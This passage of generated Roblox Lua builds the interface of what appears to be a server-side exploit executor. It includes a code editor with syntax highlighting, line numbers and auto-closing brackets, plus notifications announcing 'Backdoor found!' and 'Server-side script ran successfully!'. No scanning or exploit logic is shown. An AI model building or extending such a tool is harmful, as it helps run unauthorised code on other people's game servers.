local script = G2L["78"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.BackgroundColor3 = Color3.fromRGB(170, 0, 255)
	end)
end;
task.spawn(C_78);
-- StarterGui.ScreenGui.Frame.page5.TextButton.Notifier
local function C_7b()
local script = G2L["7b"];
	script.Parent.MouseButton1Click:Connect(function()
		local Notification = require(script.Parent.Parent.NotifierModule)
		
		local frame = script.Parent.Parent.Parent.Parent.Notify.Frame
		
		-- Start hidden
		frame.Position = UDim2.new(1, 0, 0.856, 0)
		
		-- Call notifications whenever you want:
		Notification.Notify(frame, "Changed background color to Purple!")
	end)
end;
task.spawn(C_7b);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_7e()
local script = G2L["7e"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.page1.Visible = false
		script.Parent.Parent.page2.Visible = false
		script.Parent.Parent.page3.Visible = false
		script.Parent.Parent.page4.Visible = false
		script.Parent.Parent.page5.Visible = true
	end)
end;
task.spawn(C_7e);
-- StarterGui.ScreenGui.Frame.page2.Text.LocalScript
local function C_83()
local script = G2L["83"];
	local scrollingFrame = script.Parent
	local lastY = scrollingFrame.CanvasSize.Y.Offset
	
	game:GetService("RunService").RenderStepped:Connect(function()
		local currentY = scrollingFrame.CanvasSize.Y.Offset
		
		if currentY > lastY then
			-- Expansion detected, scroll to bottom once
			scrollingFrame.CanvasPosition = Vector2.new(0, currentY)
			lastY = currentY
		end
	end)
end;
task.spawn(C_83);
-- StarterGui.ScreenGui.Frame.page2.Text.SyntaxScript
local function C_84()
local script = G2L["84"];
	local textBox = script.Parent.TextBox
	local highlighter = script.Parent.Syntax
	
	textBox.RichText = false
	highlighter.RichText = true
	
	local stringColor = Color3.fromRGB(0, 255, 0) -- bright green for strings
	local functionColor = Color3.fromRGB(217, 217, 0) -- yellow for local function names
	
	local rememberedFunctions = {}
	
	local colors = {
		[Color3.fromRGB(255, 0, 0)] = {
			"and",
			"break",
			"do",
			"else",
			"elseif",
			"end",
			"for",
			"function",
			"if",
			"in",
			"nil",
			"not",
			"or",
			"repeat",
			"return",
			"then",
			"until",
			"while"
		},
		[Color3.fromRGB(255, 255, 0)] = {
			"Connect",
			"Disconnect",
			"false",
			"true",
			"IsA",
			"Clone",
			"Destroy",
			"FindFirstChild",
			"FindFirstAncestor",
			"FindFirstAncestorOfClass",
			"FindFirstAncestorWhichIsA",
			"FindFirstChildOfClass",
			"FindFirstChildWhichIsA",
			"GetChildren",
			"GetDescendants",
			"GetFullName",
			"GetPropertyChangedSignal",
			"WaitForChild",
			"ClearAllChildren",
			"GetMouse",
			"GetService",
			"Invoke",
			"InvokeServer",
			"Fire",
			"FireServer",
			"Destroy",
			"Remove",
			"Play",
			"Stop",
			"Pause",
			"Resume",
			"TweenSize",
			"TweenPosition",
			"TweenSizeAndPosition",
			"TweenService:Create",
			"GetAsync",
			"SetAsync",
			"UpdateAsync",
			"RemoveAsync",
			"IncrementAsync",
			"GetPlayerFromCharacter",
			"GetPlayers",
			"Kick",
			"LoadAnimation",
			"LoadCharacter",
			"MoveTo",
			"SetPrimaryPartCFrame",
			"SetAttribute",
			"GetAttribute",
			"GetAttributes",
			"HasTag",
			"AddTag",
			"RemoveTag",
			"GetTags",
			"GetRankInGroup",
			"IsInGroup",
			"PromptProductPurchase",
			"PromptGamePassPurchase",
			"PromptPurchase",
			"PromptPremiumPurchase",
			"PromptGroupPurchase",
			"PromptAvatarEditor",
			"PromptBundlePurchase",
			"PromptItemPurchase",
			"PromptSubscriptionPurchase",
			"PromptNativePurchase",
			"PromptRobloxPurchase"
		},
		[Color3.fromRGB(0, 149, 223)] = {
			"game", "script", "Workspace", "Players", "Lighting",
			"ReplicatedStorage", "ReplicatedFirst", "ServerScriptService",
			"ServerStorage", "StarterGui", "StarterPack", "StarterPlayer",
			"SoundService", "Chat", "LocalizationService", "MarketplaceService",
			"HttpService", "UserInputService", "ContextActionService", "RunService",
			"TweenService", "PathfindingService", "InsertService", "TestService",
			"VirtualInputManager", "VRService", "MessagingService", "NotificationService",
			"SocialService", "DataStoreService", "MemoryStoreService", "AssetService",
			"AdService", "AnalyticsService", "ScriptContext", "Selection",
			"GuiService", "InputService", "KeyframeSequenceProvider", "NavigationService",
			"Terrain", "Teams", "CollectionService", "ContentProvider", "Stats",
			"SoundscapeService", "ThumbnailGenerator", "TranslationService",
			"VoiceChatService", "ProximityPromptService", "TextChatService",
			"MaterialService", "FaceAnimatorService", "AnimationClipProvider",
			"AssetManagerService", "PluginDebugService", "StudioData", "StudioService",
			"SelectionService", "ToolboxService", "Draggers", "TemporaryScriptService",
			"getmetatable", "load", "getgenv()"
		},
		[Color3.fromRGB(0, 170, 255)] = {
			"workspace", "loadstring", "require", "print", "task.wait", "PlayerAdded", "wait", "pairs", "ipairs", "Instance.new", "Parent", "task", "UDim2", "new",
			"Vector3", "Vector2"
		},
		
		[Color3.fromRGB(166, 0, 255)] = {
			"local"
		},
		
		[Color3.fromRGB(0, 170, 255)] = {
			"AbsoluteContentSize", "AbsolutePosition", "AbsoluteRotation", "AbsoluteSize", "AbsoluteWindowSize",
			"AccessoryType", "AccountAge", "AccountId", "Accuracy", "ActionCount", "ActionName", "Active", "Adornee",
			"AllowAmbientOcclusion", "AllowCollision", "AllowTeamChangeOnTouch", "AlwaysOnTop", "Anchored", "AngularVelocity",
			"AnimationId", "ApplyAtCenterOfMass", "Archivable", "AssetId", "Attachment0", "Attachment1", "AutoButtonColor",
			"AutoRotate", "AutomaticCanvasSize", "AutomaticSize", "BackgroundColor3", "BackgroundTransparency", "BaseTextureId",
			"Behavior", "BillboardSize", "BodyPart", "BorderColor3", "BorderMode", "BorderSizePixel", "BottomImage",
			"Brightness", "BrushSize", "Camera", "CameraOffset", "CameraTransparency", "CanCollide", "CanQuery", "CanTouch",
			"CastShadow", "CFrame", "ClassName", "ClipsDescendants", "CollisionEnabled", "CollisionGroup", "CollisionGroupId",
			"Color", "Color3", "ColorMap", "CommunicationEnabled", "Completeness", "CompletenessColor3", "Constraint",
			"Contrast", "ConversationId", "ConversationStatus", "Cooldown", "CornerRadius", "Count", "CountryRegionCode",
			"CreatorId", "CreatorType", "CurrencyType", "CurrentCamera", "CursorIcon", "CustomPhysicalProperties",
			"CycleOffset", "DataCost", "DataLimit", "DataReady", "Deprecated", "DepthMode", "Description", "DeviceGravity",
			"Direction", "DisplayDistanceType", "DisplayName", "DisplayOrder", "Distance", "Duration", "EaseDirection",
			"EaseStyle", "EasingDirection", "EasingStyle", "EmissionDirection", "Enabled", "EnvironmentDiffuseScale",
			"EnvironmentSpecularScale", "ExperienceId", "ExperienceName", "ExtentSize", "ExtentsOffset", "ExtentsOffsetWorldSpace",
			"ExtentsSize", "Face", "FaceId", "Faces", "FadeIn", "FadeOut", "FallBackImage", "FieldOfView", "FieldOfViewMode",
			"Filled", "FocusDistance", "FocusDistanceMode", "Font", "FontFace", "Force", "ForceLimitMode", "ForceLimitsEnabled",
			"ForcePlayMode", "ForwardDirection", "FrameRate", "Friction", "FrictionWeight", "From", "GameId", "GearGenreId",
			"GenreId", "Gravity", "GroupId", "Handles", "HasEverUsed", "HeadColor", "HeadScale", "Health", "HeightScale",
			"HighGain", "Hit", "HoverImage", "HumanoidDescription", "HumanoidRootPart", "Icon", "Id", "Image", "ImageColor3",
			"ImageRectOffset", "ImageRectSize", "ImageTransparency", "InUse", "InitialPrompt", "InputBegan", "InputChanged",
			"InputEnded", "InstanceId", "Intensity", "Interest", "IsActive", "IsClient", "IsLoaded", "IsPaused", "IsPlaying",
			"IsServer", "ItemId", "JobId", "JumpPower", "JumpHeight", "KeyCode", "KeyboardEnabled", "LayoutOrder", "Leaderstats",
			"LeftArm", "LeftArmColor", "LeftLeg", "LeftLegColor", "Level", "LicenseType", "LightDirection", "LightEmission",
			"LineHeight", "LinkedSource", "Loaded", "LocalTransparencyModifier", "Location", "Loop", "LoopRegion", "LoopStart",
			"LoopEnd", "Looped", "LowerAngle", "Mag", "Material", "MaterialVariant", "MaxActivationDistance", "MaxAngularVelocity",
			"MaxAxes", "MaxDistance", "MaxForce", "MaxFrictionTorque", "MaxHealth", "MaxPlayers", "MaxSlopeAngle", "MaxSpeed",
			"MaxStrength", "MaxThrust", "MaxTorque", "MaxValue", "MaxZoom", "MembershipType", "MeshId", "MeshPartHeadsAndAccessories",
			"MeshType", "MidImage", "MinDistance", "MinValue", "Modal", "Mode", "MouseButton1Down", "MouseButton1Up",
			"MouseButton2Down", "MouseButton2Up", "MouseDeltaSensitivity", "MouseIcon", "MouseLock", "MoveDirection",
			"MovementEnabled", "Name", "NameOcclusion", "NetworkOwner", "Neutral", "NormalId", "NumPlayers", "Offset",
			"Opacity", "Orientation", "Origin", "OriginalPosition", "OverlayTextureId", "OverlayTextureSize", "OverlapParams",
			"OwnerId", "P", "PackageId", "Parent", "Part0", "Part1", "ParticleEmitterRate", "Pitch", "PlaceId", "PlaceVersion",
			"PlatformStand", "PlayCount", "PlayOnRemove", "PlaybackLoudness", "PlaybackSpeed", "PlaybackState", "Player",
			"PlayerId", "PlayerToHideFrom", "Port", "Position", "PreferredPlayers", "PressedImage", "PrimaryAxis", "PrimaryPart",
			"PrivateServerId", "PrivateServerOwnerId", "ProductId", "ProximityPromptStyle", "QualityLevel", "Range", "Rate",
			"RawValue", "ReadOnly", "ReceiveAge", "ReflectionEnabled", "Reflectance", "Region", "RenderFidelity", "RenderPriority",
			"RepeatCount", "RequireHandle", "RequiresHandle", "ResampleMode", "RespawnLocation", "RespawnTime", "Responsiveness",
			"Result", "RichText", "RightArm", "RightArmColor", "RightLeg", "RightLegColor", "RiseTime", "RobloxLocked",
			"RollOffMaxDistance", "RollOffMinDistance", "RollOffMode", "RootPart", "RootPriority", "Rotation", "RotationType",
			"RuntimeEditable", "Scale", "ScreenInset", "ScrollBarThickness", "ScrollingDirection", "ScrollingEnabled",
			"SecondaryAxis", "Selected", "ServerSize", "ServerStorage", "ShadowEnabled", "Shape", "ShowDeprecatedObjects",
			"Side", "Size", "SizeConstraint", "SizeOffset", "SliceCenter", "SliceScale", "Smooth", "SoundGroup", "SoundId",
			"Source", "SourceAssetId", "Speaker", "Specular", "Speed", "SpreadAngle", "StudsBetweenTextures", "StudsPerTileU",
			"StudsPerTileV", "Style", "SubjectType", "Supports", "SurfaceAppearance", "Target", "TargetOffset", "TargetPoint",
			"TargetSurface", "TeamColor", "TeleportData", "TerrainRegion", "Text", "TextBounds", "TextColor3", "TextDirection",
			"TextEditable", "TextFits", "TextInputType", "TextScaled", "TextSize", "TextStrokeColor3", "TextStrokeTransparency",
			"TextTransparency", "TextTruncate", "TextWrapped", "TextXAlignment", "TextYAlignment", "Texture", "TextureId",
			"TextureLength", "TextureMode", "TextureSpeed", "TimeOfDay", "TimePosition", "To", "Tone", "ToolTip", "TopImage",
			"TorsoColor", "TouchEnabled", "TouchInputEnabled", "Transparency", "TriggerCooldown", "TriggerDelayTime",
			"TriggerKeyCode", "TwistLowerLimit", "TwistUpperLimit", "Type", "UIAspectRatioConstraint", "UICorner", "UIGradient",
			"UIPadding", "UIScale", "UIStroke", "Uniformity", "Unit", "UpperAngle", "UseJumpPower", "UserDialog", "UserId",
			"Value", "Velocity", "Version", "VertexColor", "VerticalScrollBarInset", "VerticalScrollBarPosition", "Video",
			"ViewSizeX", "ViewSizeY", "Visible", "Volume", "WalkSpeed", "WalkToPart", "WalkToPoint", "WaterReflectiveness",
			"WaterTransparency", "WaterWaveSize", "WaterWaveSpeed", "Weight", "WidthScale", "WorldPivot", "WorldPosition",
			"WrapLayer", "WrapTarget", "ZIndex", "ZIndexBehavior", "ResetOnSpawn"
		}
	}
	
	local ColorizePattern = '<font color="rgb(%d, %d, %d)">%s</font>'
	
	local function Colorize(text, color)
		return string.format(ColorizePattern, color.R * 255, color.G * 255, color.B * 255, text)
	end
	
	local function escapeHTML(text)
		return text:gsub("&", "&amp;"):gsub("<", "&lt;"):gsub(">", "&gt;")
	end
	
	local function ProcessText(text)
		text = escapeHTML(text)
		rememberedFunctions = {}
		
		-- Highlight strings first
		text = text:gsub("(['\"])(.-)%1", function(quote, content)
			local full = quote .. content .. quote
			return Colorize(full, stringColor)
		end)
		
		-- Highlight and remember local function names
		text = text:gsub("local%s+function%s+([%a_][%w_]*)%s*%(", function(funcName)
			table.insert(rememberedFunctions, funcName)
			return "local function " .. Colorize(funcName, functionColor) .. "("
		end)
		
		-- Highlight remembered function names when used later
		for _, funcName in ipairs(rememberedFunctions) do
			text = text:gsub("(%f[%w])(" .. funcName .. ")(%f[%W])", function(a, b, c)
				return a .. Colorize(b, functionColor) .. c
			end)
		end
		
		-- Highlight keywords
		for color, keywords in pairs(colors) do
			for _, keyword in pairs(keywords) do
				local escaped = keyword:gsub("([%(%)%.%%%+%-%*%?%[%]%^%$])", "%%%1")
				text = text:gsub("(%f[%w])(" .. escaped .. ")(%f[%W])", function(a, b, c)
					return a .. Colorize(b, color) .. c
				end)
			end
		end
		
		return text
	end
	
	local function InputChanged()
		highlighter.Text = ProcessText(textBox.Text)
	end
	
	textBox:GetPropertyChangedSignal("Text"):Connect(InputChanged)
end;
task.spawn(C_84);
-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.LocalScript
local function C_8a()
local script = G2L["8a"];
	local textBox = script.Parent
	local parent = textBox.Parent
	local textLabel = parent:FindFirstChild("TextLabel")
	
	local function updateLineNumbers()
		if not textLabel then return end
		
		local lines = string.split(textBox.Text, "\n")
		local numberedLines = {}
		
		for i = 1, #lines do
			table.insert(numberedLines, tostring(i))
		end
		
		textLabel.Text = table.concat(numberedLines, "\n")
	end
	
	textBox:GetPropertyChangedSignal("Text"):Connect(updateLineNumbers)
	
	updateLineNumbers()
end;
task.spawn(C_8a);
-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.LocalScript
local function C_8b()
local script = G2L["8b"];
	script.Parent.Text = 'print("project transparent SS")'
end;
task.spawn(C_8b);
-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.Completor
local function C_8c()
local script = G2L["8c"];
	local textBox = script.Parent
	local lastText = ""
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local currentText = textBox.Text
		local cursor = textBox.CursorPosition
		
		-- Detect insertion
		if #currentText == #lastText + 1 then
			local typedChar = currentText:sub(cursor - 1, cursor - 1)
			
			local function insertPair(openChar, closeChar)
				local before = currentText:sub(1, cursor - 2)
				local after = currentText:sub(cursor)
				textBox.Text = before .. openChar .. closeChar .. after
				textBox.CursorPosition = #before + 2
			end
			
			if typedChar == "(" then
				insertPair("(", ")")
			elseif typedChar == "\"" then
				insertPair("\"", "\"")
			elseif typedChar == "'" then
				insertPair("'", "'")
			end
			
			-- Detect deletion of opening char
		elseif #currentText == #lastText - 1 then
			local deletedPos = cursor
			local deletedChar = lastText:sub(deletedPos, deletedPos)
			local nextChar = currentText:sub(deletedPos, deletedPos)
			
			local function shouldDeletePair(openChar, closeChar)
				return deletedChar == openChar and nextChar == closeChar
			end
			
			if shouldDeletePair("(", ")") or shouldDeletePair("\"", "\"") or shouldDeletePair("'", "'") then
				local before = currentText:sub(1, deletedPos - 1)
				local after = currentText:sub(deletedPos + 1)
				textBox.Text = before .. after
				textBox.CursorPosition = deletedPos
			end
		end
		
		lastText = textBox.Text
	end)
end;
task.spawn(C_8c);
-- StarterGui.ScreenGui.Notify.CoreFunctionsNotifier
local function C_ac()
local script = G2L["ac"];
	--// FINAL NOTIFICATION SCRIPT  FULL OVERRIDE + FIXED 4 SECONDS (NO EXTENDING)
	--// LocalScript in your ScreenGui
	
	local frame = script.Parent.Frame
	local NotifyFolder = script.Parent
	
	local SuccessEvent   = NotifyFolder:WaitForChild("SuccessEvent")
	local UnSuccessEvent = NotifyFolder:WaitForChild("UnSuccessEvent")
	local ScriptRanEvent = NotifyFolder:WaitForChild("ScriptRanEvent")
	local ExecuteEvent   = NotifyFolder:WaitForChild("ExecuteEvent")
	
	local TweenService = game:GetService("TweenService")
	local TWEEN_INFO = TweenInfo.new(0.35, Enum.EasingStyle.Quint, Enum.EasingDirection.Out)
	
	local HIDDEN  = UDim2.new(1, 0, 0.856, 0)
	local VISIBLE = UDim2.new(0.752, 0, 0.861, 0)
	
	local sound = Instance.new("Sound", game:GetService("SoundService"))
	sound.SoundId = "rbxassetid://7383525713"
	sound.Volume = 1
	
	local currentTween = nil
	local hideTask = nil
	
	local function setText(text)
		local main = frame:FindFirstChild("Main")
		if main then
			local label = main:FindFirstChild("TextBox") or main:FindFirstChild("Text") or main:FindFirstChild("TextLabel")
			if label then label.Text = text end
		end
	end
	
	local function notify(message)
		-- FULL OVERRIDE: cancel everything old
		if currentTween then currentTween:Cancel() end
		if hideTask     then task.cancel(hideTask) end
		
		currentTween = nil
		hideTask = nil
		
		-- Update text instantly
		setText(message)
		
		-- Always start from hidden  clean slide-in every time
		frame.Position = HIDDEN
		
		-- Slide in fresh
		currentTween = TweenService:Create(frame, TWEEN_INFO, {Position = VISIBLE})
		currentTween:Play()
		sound:Play()
		
		-- Start a brand new 4-second timer (NOT resettable by spam)
		hideTask = task.delay(4, function()
			if currentTween then currentTween:Cancel() end
			currentTween = TweenService:Create(frame, TWEEN_INFO, {Position = HIDDEN})
			currentTween:Play()
			hideTask = nil
		end)
	end
	
	-- All your events
	SuccessEvent.Event:Connect(function(backdoor)
		local name = typeof(backdoor) == "Instance" and backdoor:GetFullName() or tostring(backdoor)
		notify("Backdoor found! Backdoor name: " .. name)
	end)
	
	UnSuccessEvent.Event:Connect(function() notify("No backdoor detected. Join a backdoored game!") end)
	ScriptRanEvent.Event:Connect(function() notify("Server-side script ran successfully!") end)
	ExecuteEvent.Event:Connect(function() notify("Executed script successfully!") end)
	
	NotifyFolder.TextClear.Event:Connect(function() notify("Cleared script box successfully!") end)
	NotifyFolder.SpawnEvent.Event:Connect(function() notify("Respawned successfully!") end)
	NotifyFolder.R6Event.Event:Connect(function() notify("Converted to R6 successfully!") end)
	
	-- Start hidden
	frame.Position = HIDDEN
end;
task.spawn(C_ac);
-- StarterGui.ScreenGui.TextButton.LocalScript
local function C_b5()
local script = G2L["b5"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Frame.Visible = true
		script.Parent.Visible = false
	end)
end;
task.spawn(C_b5);

return G2L["1"], require;
